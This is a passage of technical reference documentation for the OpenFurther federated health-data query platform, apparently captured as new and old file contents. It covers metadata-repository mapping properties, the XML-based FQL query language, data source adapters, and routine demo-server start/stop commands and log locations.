Procedure, or Lab) in the FURTHER model so we know what kind of data the row is representing. The Prop_Val is the SNOMED code representing the observation type. If the FURTHER.Obervation table translates to ONLY one table at the external data source, we do not need to configure this, but do ensure that the ALIAS_KEY and ALIAS_VALUE properties are configured properly as stated above in Normal Scenario 3. Always start the Prop_Name with \u201cOBSERVATION_TYPE\u201d.\n\nNote: OBSERVATION_TYPE_DX means Diagnosis.\n\nProp_Name = OBSERVATION_TYPE_DX\n\nProp_Val = 439401001\n\nOr\n\nProp_Name = OBSERVATION_TYPE_LAB\n\nProp_Val = 364712009\n\nOr\n\nProp_Name = OBSERVATION_TYPE_PROCEDURE\n\nProp_Val = 71388002\n\n\n.Special Scenario 3 Addendum) To distinguish between coding standards with the Same Observation Type.\nWhen you have multiple attributes that translated to multiple coding standards in the external data source, you will need to configure the Prop_Name with a unique name and appended DTS Namespace ID to the Prop_Val. Replace the ^DTS_Namespace_ID with whatever you are actually using in your DTS environment.\n\nFor Diagnosis, using ICD9\n\nProp_Name = OBSERVATION_TYPE_DX_ICD9\n\nProp_Val = 439401001^10\n\nFor Diagnosis, using ICD10\n\nProp_Name = OBSERVATION_TYPE_DX_ICD10\n\nProp_Val = 439401001^1518\n\nif you would like to force a specific observationType and namespace combination to Error Out,\nyou append '^E' at the end of the Prop_Name like this:\n\nProp_Name = OBSERVATION_TYPE_DX_ICD10^E\n\nProp_Val = 439401001^1518\n\n\n.Special Scenario 4) Sometimes one FURTHER <criteria> node translates to two <criteria> nodes at the External Data Source. For example, FURTHER.Person.race translates to OpenMRS.PersonAttribute.value, where the PersonAttributeType = 1. Therefore, we need one <criteria> for the OpenMRS.PersonAttribute.value and another <criteria> node for OpenMRS.PersonAttribute.PersonAttributeType. What we will do is create an XML Template in the MDR where we will replace a specific <criteria> with the translated criteria. Refer to the example below. \n\nTo configure a XML Template, use this Property:\n\nProp_Name = MORE_CRITERIA\n\nProp_Val = {XML Template} (In One Continuous String is better for output format)\n\nWhere Prop_Val =\n\/\/ Not sure why i cannot use \n\/\/ [source,xml] to display source code here...\n\n<criteria xmlns=\"http:\/\/further.utah.edu\/core\/query\"\n xmlns:xs=\"http:\/\/www.w3.org\/2001\/XMLSchema\" \n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\">\n\t<searchType>IN<\/searchType>\n\t<parameters>\n\t\t<parameter xsi:type=\"xs:string\">personId<\/parameter>\n\t<\/parameters>\n\t<query rootObject=\"Person\" xmlns=\"http:\/\/further.utah.edu\/core\/query\"\n\t\txmlns:xs=\"http:\/\/www.w3.org\/2001\/XMLSchema\" xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\">\n\t\t<rootCriterion>\n\t\t\t<searchType>CONJUNCTION<\/searchType>\n\t\t\t<criteria moreCriteria=\"ReplaceMe\"><\/criteria>\n\t\t\t<criteria>\n\t\t\t\t<searchType>SIMPLE<\/searchType>\n\t\t\t\t<parameters>\n\t\t\t\t\t<parameter xsi:type=\"RelationType\">EQ<\/parameter>\n\t\t\t\t\t<parameter xsi:type=\"xs:string\">pa.personAttributeType<\/parameter>\n\t\t\t\t\t<parameter xsi:type=\"xs:long\">1<\/parameter>\n\t\t\t\t<\/parameters>\n\t\t\t<\/criteria>\n\t\t<\/rootCriterion>\n\t\t<aliases>\n\t\t\t<alias associationObject=\"PersonAttribute\">\n\t\t\t\t<key>pa<\/key>\n\t\t\t\t<value>personAttributes<\/value>\n\t\t\t<\/alias>\n\t\t<\/aliases>\n\t<\/query>\n<\/criteria>\n\n.Special Scenario 5) Sometimes a FURTHER Person Field translates to a non-person table at the external source. Since we do not get <alias> nodes for FURTHER Person Fields, we need to create new alias(es) for these scenarios. For example, FURTHER.Person.vitalStatus translates to OpemMRS.ObservationPeriod.personStatusConceptId field. In this case, use this property configuration:\n\nProp_Name = ATTR_ALIAS\n\nProp_Val = \u201caliasKey^aliasValue\u201d\n\nWhere, Prop_Val = \u201cop^observationPeriods\u201d\n\nNote that duplicate Aliases are removed during the cleanup phase. So having more than one of these configured is ok. However, in order to support \u2018AND\u2019 conditions with multiple fields in the SAME table, we need to replace <criteria> with a subquery template using Special Scenario 4 above. \n\n.Special Scenario 6) Add Extra Alias for Special Cases\nSometimes we have an alias that translates to multiple aliases due to hierarchy relationship levels. This EXCLUDES Observation Types Issues. For example, FURTHER.orders table translates to OpenMRS.patient.orders table. Therefore, we need another alias to support the Sub Level. We need the Translated aliases to be like this, where the ord will go through the patient object:\n\n<aliases>\n <alias associationObject=\"Observations\">\n <key>p<\/key>\n <value>patient<\/value>\n <\/alias>\n <alias associationObject=\"Order\">\n <key>ord<\/key>\n <value>p.orders<\/value>\n <\/alias>\n<\/aliases>\n\nNote that for this situation, we DO NOT want to update any parameter alias values in the XML Query file.\n\nProp_Name = EXTRA_ALIAS\n\nProp_Val = \u201caliasKey^aliasValue\u201d\n\ni.e. Prop_Val = \u201cobs^observations\u201d\n\nNote that duplicate Aliases are removed during the cleanup phase. So having more than one of these configured is ok. However, in order to support \u2018AND\u2019 conditions with multiple fields in the SAME table, we need to replace <criteria> with a subquery template using Special Scenario 4 above.\n\n.Special Scenario 7) To activate Dynamic Custom Function Calls, we can configure a function name, prefixed with 'CUSTOM^fqt:'.\nYou must have a XQuery function with a matching name for this to work. \nNote that the function name must be prefixed with the 'fqt:' XQuery Namespace.\n\nFor example, if you want to apply a Custom XQuery function yearFromDateTime to the value to be translated:\n\nProp_Name = ATTR_VALUE_TRANS_FUNC\n\nProp_Val = CUSTOM^fqt:yearFromDateTime\n\n\n\n\n\n.Part Two (Result Translations)\nThere are Normal Scenarios and Special Scenarios for Result Translations.\n\n.Normal Scenario 1) Specify the RESULT_PATH for each External Asset. You can include the XPath Predicate when necessary. The XPath Value begins under the rootObject of the External data model. For example, if the rootObject is Person, and you are trying to get to the gender, use \u2018\/gender\u2019 as the XPath value. The rootObject \u2018\/Person\u2019 part is not needed.\n\nProp_Name = RESULT_PATH\n\nProp_Val = {XPath Value to the External XML Node}\n\nFor example, Prop_Val =\n\/personAttributes\/personAttribute\/value[..\/personAttributeType=1]\n\n.Normal Scenario 2) Specify the External Root Object\u2019s ID Attribute.\n\nGenerally, this property is set for the {FURTHER.PERSON} to {EXTERNAL.PERSON} association.\n\nNote that we may want to rename this property name to EXT_PERSON_ID_ATTR in the future, since we may want to support multiple root objects in the future.\n\nProp_Name = EXT_ROOT_ID_ATTR\n\nProp_Val = {rootObject ID Attribute}\n\nFor example, Prop_Val = personId\n\nBe sure to have a One-To-One Mapping for the rootObject. If a One-To-Many mapping is really necessary, specify an additional property with:\n\nProp_Name = RESULT_SELECTION\n\nProp_Val = pickMe\n\nOr you can disable the unnessary association by setting the asset_assoc.enabled field to \u2018N\u2019.\n\n.Special Scenario 3) To skip an attribute from Result Translation, Set the RESULT_PATH property value to \u201cS\u201d (Skip).\nA Result Attribute will automatically be skipped if it has no value, or if the result tag does not exist.\n\nProp_Name = RESULT_PATH\n\nProp_Val = S\n\n.Part Three (Query & Result Translations)\nBy default, when calling DTS (Apelon Terminology Server), we get the exact match of the external 'Local Code' value.\nHowever, we can override this default with an association property like this:\n\nIf we want to get the value of DTS property type 'Value_Of_Race'\n\nProp_Name = EXTERNAL_PROPERTY_NAME\n\nProp_Val = Value_Of_Race\n\nOR\n\nIf we want to get the value of DTS property type 'Domain'\n\nProp_Name = EXTERNAL_PROPERTY_NAME\n\nProp_Val = Domain\n\nThis will create a DTS call like this:\n\nhttp:\/\/dev-esb.further.utah.edu:9000\/dts\/rest\/translate\/30\/Code%20in%20Source\/439401001\/32776\/Domain?view=HUMAN\n\n\n\nData Source Adapters\n--------------------\nData source adapters are the pieces of OpenFurther which interact with a data source. Loosely speaking, data source adapters are like plugins. They are simply modules that listen for incoming query requests and act upon them, following a specified protocol. Any programming language that can send and receive messages to a JMS topic, as well as process XML, can be used to program a data source adapter. We do, however, recommend using the existing framework.\n\nData source adapters follow a standard protocol:\n\n* initialization\n* query translation\n* execution\n* result translation\n\nAt the end of each step, status messages are sent to a JMS topic. Statuses include the current state of the query and how many results have been processed at that time.\n\nLikewise, every query can be in one of the following states:\n\n* QUEUED\n* STARTED\n* EXECUTING\n* STOPPED\n* FAILED\n\nJava Data Source Adapter Framework\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nOpenFurther provides several data source adapters, supported by the community, that run against well known data models. These adapters can be used by downloading the existing adapter, customizing the configuration, compiling them for execution, and installing them into the system.\n\nAdditionally, OpenFurther is flexible and also provides the ability to implement your own custom adapter. Reasons for doing this include but are not limited to:\n\n* A custom data model\n* A custom interface for accessing the data, such as a web service.\n* Custom processing required beyond the standard processing steps within an adapter.\n\nImplementing a custom data source adapter\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nWe recommend downloading the source code of an existing data source adapter to use as a reference and starting point for your custom data source adapter. Existing data source adapters can found here https:\/\/github.com\/openfurther\/further-open-datasources\n\nQuery Processors\n^^^^^^^^^^^^^^^^\nData source adapters follow a chain-of-responsibility pattern. The query is passed through several processors and each processor is given an opportunity to interact or ignore the data given to it by the processing of previous processors. \n\nThere are several default query processors for each step within data source adaption.\n\nEach Query Processor has a Delegate implementation that contains the business logic to implement each processor.\n\n* QueryTranslatorQp\n** Delegate: QueryTranslatorXQueryImpl - implements query translator by utilizing an XQuery program which in turns utilizes metadata within the MDR. Xquery files are stored within the MDR and can be referenced by path. The path to the MDR file is given as part of initialization.\n* QueryExecutorQp\n** Delegate: ExecutorQuestImpl \u2013 implements query execution based on the data source type specified by DS_TYPE within initialization. Currently, only database data sources are well supported, however, web services data sources can be implemented with additional effort.\n* ResultTranslatorQp\n** Delegate: ResultTranslatorXqueryImpl \u2013 implements results translation by applying an xquery file to the marshaled XML results. Xquery files are stored within the MDR and can be referenced by path. The path to the MDR file is given as part of initialization.\n* FinalizerQp\n** Delegate: FinalizerMock \u2013 does nothing but finish the query\n\nFederated Query Engine (FQE)\n----------------------------\n\nFederated Query Language (FQL)\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nAll queries sent to OpenFurther are constructed using FQL. FQL is an object oriented query language expressed in XML that is largely based off of the http:\/\/docs.jboss.org\/hibernate\/orm\/3.3\/reference\/en\/html\/querycriteria.html[Hibernate Criteria API]. \n\nRoot Object\n^^^^^^^^^^^\nFQL queries are constructed against a given data model, for instance, the OpenFurther model. Every query is centered around a given object. This is called the root object. For instance, when querying for persons with a particular diagnosis, the root object would be Person.\n\nYou declare the root object as an attribute of the <query> tag\n\n.Declaring a root object\n[source,xml,numbered]\n----\n<query xmlns=\"http:\/\/further.utah.edu\/core\/query\" \n\txmlns:xs=\"http:\/\/www.w3.org\/2001\/XMLSchema\"\n\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\" \n\trootObject=\"Person\">\n\t....\n<\/query>\n----\n\nQuery Attributes\n^^^^^^^^^^^^^^^^\nFQL query attributes are simply the field names (instance variables) of the root object you're querying against. If you're familiar with SQL, you can think of query attributes like database columns.\n\nFor instance, in the following Person class, you could use 'compositeId', 'administrativeGenderNamespaceId', and 'administrativeGender' are all query attributes that can be used in FQL.\n\n.Java root object fields\n[source,java,numbered]\n----\npublic class Person implements PersistentEntity<PersonId>\n{\n\n\t@Column(name = \"FPERSON_COMPOSITE_ID\")\n\tprivate String compositeId;\n\n\t@Column(name = \"administrative_gender_nmspc_id\")\n\tprivate Long administrativeGenderNamespaceId;\n\n\t@Column(name = \"administrative_gender_cid\")\n\tprivate String administrativeGender;\n\n\t....\n\n}\n----\n\nFQL Reference\n^^^^^^^^^^^^^\n\nSimple Expressions\n++++++++++++++++++\n\n.EQ - Equals\n[source,xml,numbered]\n----\n<criteria>\n <searchType>SIMPLE<\/searchType>\n <parameters>\n <parameter>EQ<\/parameter>\n <parameter>DiagnosisGrouping.codeSequenceNumber<\/parameter>\n <parameter>766.2<\/parameter>\n <\/parameters>\n<\/criteria>\n----\n\n.NE - Not Equals\n[source,xml,numbered]\n----\n<criteria>\n <searchType>SIMPLE<\/searchType>\n <parameters>\n <parameter>NE<\/parameter>\n <parameter>Lab.value<\/parameter>\n <parameter>1234<\/parameter>\n <\/parameters>\n<\/criteria>\n----\n\n.GT - Greater Than\n[source,xml,numbered]\n----\n<criteria>\n <searchType>SIMPLE<\/searchType>\n <parameters>\n <parameter>GT<\/parameter>\n <parameter>Lab.reading<\/parameter>\n <parameter>1234<\/parameter>\n <\/parameters>\n<\/criteria>\n----\n\n.LT - Less Than\n[source,xml,numbered]\n----\n<criteria>\n <searchType>SIMPLE<\/searchType>\n <parameters>\n <parameter>LT<\/parameter>\n <parameter>Lab.reading<\/parameter>\n <parameter>1234<\/parameter>\n <\/parameters>\n<\/criteria>\n----\n\n.LE - Less Than or Equal\n[source,xml,numbered]\n----\n<criteria>\n <searchType>SIMPLE<\/searchType>\n <parameters>\n <parameter>LE<\/parameter>\n <parameter>Lab.reading<\/parameter>\n <parameter>1234<\/parameter>\n <\/parameters>\n<\/criteria>\n----\n\n.GE - Greater Than or Equal\n[source,xml,numbered]\n----\n<criteria>\n <searchType>SIMPLE<\/searchType>\n <parameters>\n <parameter>GE<\/parameter>\n <parameter>Lab.reading<\/parameter>\n <parameter>1234<\/parameter>\n <\/parameters>\n<\/criteria>\n----\n\nUnary Expressions\n+++++++++++++++++\n\n.NOT - Negation\n[source,xml,numbered]\n----\n<criteria>\n <searchType>NOT<\/searchType>\n <parameters\/>\n <criteria>\n ...\n <\/critera>\n<\/criteria>\n----\n\nMultinary Expressions\n+++++++++++++++++++++\n\n.Conjunction - a conjunction between two or more expressions\n[source,xml,numbered]\n----\n<criteria>\n <searchType>CONJUNCTION<\/searchType>\n <parameters\/>\n <criteria>\n ...\n <\/criteria>\n <criteria>\n ...\n <\/criteria>\n <criteria>\n ...\n <\/criteria>\n<\/criteria>\n----\n\n.Disjunction - a disjunction between two or more expressions\n[source,xml,numbered]\n----\n<criteria>\n <searchType>DISJUNCTION<\/searchType>\n <parameters\/>\n <criteria>\n ...\n <\/criteria>\n <criteria>\n ...\n <\/criteria>\n <criteria>\n ...\n <\/criteria>\n<\/criteria>\n----\n\nInterval Expressions\n++++++++++++++++++++\n\n.Between\n[source,xml,numbered]\n----\n<criteria>\n <searchType>BETWEEN<\/searchType>\n <parameters>\n <parameter>Observation.observationValue<\/parameter>\n <parameter>1<\/parameter>\n <parameter>2<\/parameter>\n <\/parameters>\n<\/criteria>\n----\n\nString Expressions\n++++++++++++++++++\n\n.Like - Contains the value\n[source,xml,numbered]\n----\n<criteria>\n <searchType>LIKE<\/searchType>\n <parameters>\n <parameter xsi:type=\"xs:string\">Observation.observation<\/parameter>\n <parameter xsi:type=\"xs:string\">250<\/parameter>\n <\/parameters>\n <options>\n <matchType>CONTAINS<\/matchType>\n <ignoreCase>false<\/ignoreCase>\n <\/options>\n<\/criteria>\n----\n\n.Like - Exact match of the value\n[source,xml,numbered]\n----\n<criteria>\n <searchType>LIKE<\/searchType>\n <parameters>\n <parameter xsi:type=\"xs:string\">Observation.observation<\/parameter>\n <parameter xsi:type=\"xs:string\">250<\/parameter>\n <\/parameters>\n <options>\n <matchType>EXACT<\/matchType>\n <ignoreCase>false<\/ignoreCase>\n <\/options>\n<\/criteria>\n----\n\n.Like - Value starts with\n[source,xml,numbered]\n----\n<criteria>\n <searchType>LIKE<\/searchType>\n <parameters>\n <parameter xsi:type=\"xs:string\">Observation.observation<\/parameter>\n <parameter xsi:type=\"xs:string\">250<\/parameter>\n <\/parameters>\n <options>\n <matchType>STARTS_WITH<\/matchType>\n <ignoreCase>false<\/ignoreCase>\n <\/options>\n<\/criteria>\n----\n\n.Like - Value ends with\n[source,xml,numbered]\n----\n<criteria>\n <searchType>LIKE<\/searchType>\n <parameters>\n <parameter xsi:type=\"xs:string\">Observation.observation<\/parameter>\n <parameter xsi:type=\"xs:string\">250<\/parameter>\n <\/parameters>\n <options>\n <matchType>ENDS_WITH<\/matchType>\n <ignoreCase>false<\/ignoreCase>\n <\/options>\n<\/criteria>\n----\n\nCollection Expressions\n++++++++++++++++++++++\n\n.In - Value(s) is within set\n[source,xml,numbered]\n----\n<criteria>\n <searchType>IN<\/searchType>\n <parameters>\n <parameter xsi:type=\"xs:string\">Observation.observation<\/parameter>\n <parameter xsi:type=\"xs:string\">401.1<\/parameter>\n <parameter xsi:type=\"xs:string\">401.2<\/parameter>\n <parameter xsi:type=\"xs:string\">401.3<\/parameter>\n <\/parameters>\n<\/criteria>\n----\n\nFQL to Hibernate Criteria\n^^^^^^^^^^^^^^^^^^^^^^^^^\nSince FQL is largely based on Hibernate Criteria objects, it's possible to convert an FQL query into Hibernate Criteria that will then allow Hibernate to convert that into SQL.\n\nConverting an FQL is very simple.\n\n1. Using JAXB, unmarshal the XML into a SearchQueryTo.\n2. Locate the root hibernate entity class (typically Person or Patient) <Root Entity>\n3. Call the QueryBuilder class like below\n\n.Converting FQL to Hibernate Criteria\n[source,java,numbered]\n----\nfinal GenericCriteria hibernateCriteria = \n\tQueryBuilderHibernateImpl.convert(CriteriaType.CRITERIA, <Root \n\t\tEntity>.class, sessionFactory, searchQuery);\n----\n\nFQL Schema\n^^^^^^^^^^\n.FQL Schema\nimage::images\/figures\/search_query_xsd.png[]\n\nTechnologies\n------------\nOpenFurther is built on a number of Open Source technologies\n\n* Languages\n** Java\n** Groovy \n** Bash\n** Python\n* Development Tools\n** Maven 3\n** SonaType Nexus\n** Eclipse\n** Git\n** JIRA\n** Bamboo\n* Service Frameworks\n** Spring\n** Apache Commons\n** Apache CXF\n** Apache Camel\n* Application Servers\n** Apache ServiceMix\n* Testing\n** JUnit\n** Spock\n\nInstalling\n----------\nOpenFurther is provided as a VM image for download at this time. The VM can be used as a reference for installation, typically splitting out each Linux user as an individual server.\n\nTODO: Expand this section with detailed instructions for installing on Linux and Windows\n\nDemo System Administration\n---------------------------\nOpenFurther utilizes a number of different servers to run. The following instructions pertain to the demo VM of OpenFurther that is available for download. All scripts used for starting and stopping services are available within the further-open-extras repository on GitHub.\n\nTIP: The demo version contains all of the servers as individual Linux users.\n\nApache HTTP Server\n~~~~~~~~~~~~~~~~~~\nThe Apache HTTP server runs on port 80 and port 443. As root, run the following\n\n----\nservice httpd start|stop\n----\n\nIn-Memory Database Server\n~~~~~~~~~~~~~~~~~~~~~~~~~\nThe HSQLDB server runs on port 9001. As root, run the following\n\n----\n\/etc\/init.d\/hsqldb start|stop\n----\n\nCore Database Server\n~~~~~~~~~~~~~~~~~~~~\nNOTE: While our architecture supports different database, we've currently only tested OpenFurther on Oracle and Oracle XE\n\n----\nservice oracle-xe start|stop\n----\n\nTerminology Server\n~~~~~~~~~~~~~~~~~~\nThe terminology server (Apelon DTS) runs on port 16666 (Requires that the Oracle Database Server has started). As root, run the following\n\n----\nsu - dtsdemo\ndts-auto start|stop\n----\n\nEnterprise Service Bus (ESB)\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nOpenFurther utilizes an ESB (Apache ServiceMix) to run application code. The ESB requires that the in-memory database, core database, and terminology server are already started. As root, run the following\n\n----\nsu - esb\nstart_esb\n----\n\nTo stop the ESB:\n\n----\nsu - esb\nesbl\nfurther@localhost\u2019s password:\nfurther@local> shutdown\nConfirm: shutdown instance local (yes\/no):\n----\n\nLogging Locations\n~~~~~~~~~~~~~~~~~\n\nApache HTTP Server\n^^^^^^^^^^^^^^^^^^\nThe Apache HTTP server logs are located in \/var\/www\/httpd\/\n\nIn-Memory Database Server\n^^^^^^^^^^^^^^^^^^^^^^^^^\nThe HSQLDB is currently not configured for logging\n\nCore Database Server\n^^^^^^^^^^^^^^^^^^^^\nThe Oracle XE database server is currently not configured for logging\n\nTerminology Server\n^^^^^^^^^^^^^^^^^^\nThe Apelon DTS server logs in \/home\/demodts\/Apelon_DTS\/dts\/bin\/logs\n\nEnterprise Service Bus (ESB)\n^^^^^^^^^^^^^^^^^^^^^^^^^^^\nServiceMix ESB logs in \/home\/esb\/servicemix\/data\/log\n\nOpenFurther-i2b2\n^^^^^^^^^^^^^^^^\nFURTHeR-i2b2 logs in 2 different locations\n\n* jboss: \/home\/i2b2\/jboss\/server\/default\/logs\n* tomcat: \/home\/i2b2\/tomcat\/logs\n","old_contents":"OpenFurther Reference Documentation\n===================================\n\nAbout\n-----\nThe following documentation applies to *OpenFurther version 1.4.0-SNAPSHOT*\n\nConventions\n~~~~~~~~~~~\n\nNOTE: A note\n\nIMPORTANT: An important point\n\nTIP: A tip\n\nWARNING: A warning\n\nCAUTION: A point of caution\n\nIntroduction\n------------\nOpenFurther is an informatics platform that supports federation and integration of data from heterogeneous and disparate data sources.\n\nIt has been deployed at the University of Utah (UU) as the Federated Utah Research and Translational Health e-Repository (FURTHeR) since August 2011 and is available for use by all U of U employees and students. OpenFurther links heterogeneous data types, including clinical, public health, biospecimen and patient-generated data; empowering researchers with the ability to assess feasibility of particular clinical research studies, export biomedical datasets for analysis, and create aggregate databases for comparative effectiveness research. With the ability to link unique individuals from these sources, OpenFurther is able to identify cohorts for clinical research.\n\nIt provides semantic and syntactic interoperability as it federates health information on-the-fly and in real-time and requires neither data extraction nor homogenization by data source partners, facilitating integration by retaining data in their native format and in their originating systems.\n\nOpenFurther is built upon Maven, Spring, Hibernate, ServiceMix, and other open source frameworks that promote OpenFurther's code reusability and interoperability.\n\n\nArchitecture\n------------\nLoosely, OpenFurther runs as a multi-tier application. The presentation layer or front end\/user-interface is served (currently) through the i2b2 web client. The logic layer is served through the ServiceMix ESB, and the database layer is served using Oracle 11g, although it can be configured for other databases as well.\n\nUser Interface\n~~~~~~~~~~~~~~\nOpenFurther utilizes the i2b2 web client as a front-end for querying data. The user interface has been modified to support federated querying.\n\n.Customized i2b2 User Interface\nimage::images\/figures\/i2b2_ui_query_results.png[]\n\nHooking OpenFurther into i2b2\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nOpenFurther utilizes a Java Servlet Filter to divert query requests to the OpenFurther backend system. The Servlet filter looks for XML messages from i2b2 that indicate a query is being run. Those XML messages are then diverted to OpenFurther where OpenFurther converts them into a OpenFurther query and runs them. All other XML messages are ignored and i2b2 is allowed to run as normal. \n\nNOTE: *No data is stored within i2b2, all data resides within its original location*\n\nThe Federated Query Engine (FQE)\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nIn OpenFurther, the term \"FQE\" (Federated Query Engine) is broadly referred to as the set of software modules involved in the execution of a federated query.\n\n.Federated Query Engine\nimage::images\/figures\/fqe.png[]\n\n* A federated query written in FQL (an XML based query language) or an i2b2 query is submitted at *1*.\n* Utilizing the publish-subscribe pattern, one or more data source adapters are subscribed to the Query Topic at *2*. \n* If the query is an i2b2 query, the FQE converts the i2b2 query to a federated query. \n* The FQE then posts the query to the Query Topic (*2*) and each listening data source adapter receives a copy of the query.\n* Each data source adapter runs through a number of steps to initialize, process, and translate a query for a given data source (Explained below). \n* Throughout the processing, status messages are sent to a Status Queue at *3*. \n* Once results are translated to a common model, they are persisted to the In-Memory database and result count is sent to *4*.\n\nData Source Adapters\n~~~~~~~~~~~~~~~~~~~~\nData source adapters are facades around an existing data source. Data source adapters can be entirely custom for any given implementation or they can use a pre-written adapter if their data source is already in a well-known format such as OMOP, i2b2, OpenMRS, etc\n\nData source adpater configuration should follow the configuration steps outlined in reference-manual-datasources link:reference-manual-datasources.pdf[pdf], link:reference-manual-datasources.asciidoc[asciidoc] \n\n.Data Source Adapters\nimage::images\/figures\/data_source_adapters.png[]\n\n* Data source adapters follow the chain-of-responsibility pattern. The process of adapting a query is broken down into several small steps and each output is passed on to the next step. Data source adapters typically have 4 commons steps. \n\n1. They are given an initialization step which allows them to determine whether or not the given data source can answer the given query. It also provides for any other initialization required throughout the process. \n2. Query translation translates the logical FQL that is not specific to any data source into data source specific language. This will vary with data sources. Some data sources will utilize SQL, other\u2019s might be a web service. It utilizes the Metadata Repository (MDR) for translating attributes and values (e.g. logical query uses Gender but actual data source uses Sex as the attribute). It also utilizes DTS (Terminology Server) to translate from a given code (e.g. ICD9 250) to the data source\u2019s code (e.g. 12345) \n3. The query is executed against the data source and results are returned in their native format (SQL ResultSet, XML, etc). \n4. Result translations translates the results into a common model with standardized vocabulary\/terminology utilizing the Metadata Repository (MDR) and DTS (Terminology Server).\n\nTerminology Server\n~~~~~~~~~~~~~~~~~~\nOpenFurther utilizes Apelon's Distributed Terminology System version 3.5.2.203 (aka. DTS) for terminology related functionality. The OpenFurther instance of DTS contains concepts from the standard terminologies SNOMED-CT, ICD-9, RxNorm, and UCUM. There are also non-standard terminologies (aka Local) for each of the data sources as well as associated mappings. The use of standard terminologies and mappings make it possible for the software to resolve differences between concepts in various data sources and achieve a degree of semantic interoperability. Use of Apelon DTS is an assumption of agreement to the Apache Version 2 standard open source license agreement http:\/\/www.apache.org\/licenses\/LICENSE-2.0.html. For more information about Apelon DTS please see their website http:\/\/www.apelon.com.\n\nFeatures of Apelon DTS\n^^^^^^^^^^^^^^^^^^^^^^\nThe Apelon DTS (Distributed Terminology System) is an integrated set of open source components that provides comprehensive terminology services in distributed application environments.\n\nDTS Supports national and international data standards, which are a necessary foundation for comparable and interoperable health information, as well as local vocabularies.\n\nDTS consists of\n\n* DTS Core - the core system, database, api, etc\n* DTS Editor - a GUI interface for viewing, adding, and editing concepts\n* DTS Browser - a web interface for viewing concepts\n* Modular Classifier - allows for extending standard ontologies\n\nTerminology\n-----------\n\nGetting Started\n~~~~~~~~~~~~~~~\nIn order to utilize the OpenFurther software, it is necessary to have terminology mappings from your desired data sources to standard terminologies. These standard codes are then translated via the software, terminology server, and associated mappings to be able to resolve to a local data source's codes\/terms.\n\nIMPORTANT: It is important to note that the content distributed with OpenFurther is for demonstration purposes only. The standard terminologies have been provided with permission via Apelon's distribution of free subscription content available on their open source website link:http:\/\/apelon-dts.sourceforge.net\/[]. This standard content is several years out of date and would not be the most suitable for a real world instance. \n\nTIP: It is recommended for organizations that desire to use the OpenFurther software to consider resourcing a dedicated terminologist or someone that has experience with controlled vocabularies and ontologies to work on managing\/mapping local vocabularies\/codes to their specific implementation of OpenFurther.\n\nApelon provides a content delivery subscription service at a reasonable cost. Standard terminologies can also be downloaded from the U.S. National Library of Medicine Unified Medical Language System (link: http:\/\/www.nlm.nih.gov\/research\/umls\/[UMLS]) after meeting and accepting their requirements and license agreements. \n\nNOTE: The local vocabularies have been mapped to the best possible matches to the available standard terminologies. However, in some cases such as OpenMRS, local concepts had to be created to fit the OpenFurther demonstration scenario. Any creation of local concepts was done in best accordance of the specifications provided by the source. \n\nOpenFurther's i2b2 front end user interface contains an ontology based off of the recommendations of the Healthcare Information Technology Standards Panel (HITSP). For instance, HITSP recommends the use of ICD-9 codes for diagnosis and LOINC for laboratory data. Please note that because of licensing agreements, not all of the HITSP recommendations could be followed for OpenFurther. For example, HITSP recommends the use of CPT for procedures. In OpenFurther, procedures will be based off the SNOMED CT hierarchy for procedures.\n\nWhy are mappings needed?\n^^^^^^^^^^^^^^^^^^^^^^^\nMappings are needed because of the variations in terminology used between disparate data sources. Mappings equate concepts that are intended to mean the same thing. \n\nTIP: Mapping can be a very human labor intensive task. Mappings must be verified and tested to ensure quality of results. Involving subject matter experts and collaborating effectively across datasources will be paramount to achieving a successful implementation of terminology.\n\n.Mapping Terminology\nimage::images\/figures\/mapping_terminology.png[]\n\nInitial Steps\n^^^^^^^^^^^^^\nApelon DTS provides excellent documentation and examples of how to use their terminology server software. All Apelon documentation can be found at: http:\/\/apelon-dts.sourceforge.net\/documents.html\n\nIMPORTANT: It is highly recommended that you familiarize yourself with the basic use of the Apelon DTS software. The instance included in OpenFurther can serve as an example of how the OpenFurther team has used Apelon DTS but the best instruction on how to use Apelon DTS is provided directly from Apelon. \n\nLocal Namespaces\n++++++++++++++++\nRefer to page http:\/\/apelon-dts.sourceforge.net\/3.5\/docs\/dtseditor.pdf#62[62] of the Apelon DTS Editor documentation.\n\nAuthorities\n+++++++++++\nRefer to page http:\/\/apelon-dts.sourceforge.net\/3.5\/docs\/dtseditor.pdf#72[72] of the Apelon DTS Editor documentation.\n\nAssociation Types\n+++++++++++++++++\nRefer to pages http:\/\/apelon-dts.sourceforge.net\/3.5\/docs\/dtseditor.pdf#75[75-77] of the Apelon DTS Editor documentation.\n\nAssociation Qualifier Types\n+++++++++++++++++++++++++++\nRefer to pages http:\/\/apelon-dts.sourceforge.net\/3.5\/docs\/dtseditor.pdf#80[80-84] of the Apelon DTS Editor documentation.\n\nProperty Types\n++++++++++++++\nRefer to pages http:\/\/apelon-dts.sourceforge.net\/3.5\/docs\/dtseditor.pdf#94[94-96] of the Apelon DTS Editor documentation.\n\nProperty Qualifier Types\n++++++++++++++++++++++++\nRefer to pages http:\/\/apelon-dts.sourceforge.net\/3.5\/docs\/dtseditor.pdf#99[99-101] of the Apelon DTS Editor documentation.\n\nAdding new concepts\/terms, assign properties, assosciations\/mappings\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\nRefer to pages http:\/\/apelon-dts.sourceforge.net\/3.5\/docs\/dtseditor.pdf#119[119-141] of the Apelon DTS Editor documentation.\n\nBulk loading and working with spreadsheets\n++++++++++++++++++++++++++++++++++++++++++\n\nRefer to the import wizard plugin http:\/\/sourceforge.net\/apps\/trac\/apelon-dts\/raw-attachment\/wiki\/MiscWikiFiles\/importwizarduserguide-3.0.pdf[user guide]\n\n\nThe Metadata Repository (MDR)\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nThe MDR is responsible for storing information (artifacts) about varying data sources. This includes things like data models, attributes, attribute types, etc. It is accessed using web services.\n\n* Home grown but follows standards\n** XMI, Dublin Core\n** HL7 datatypes, CDA, DDI\n* Stores 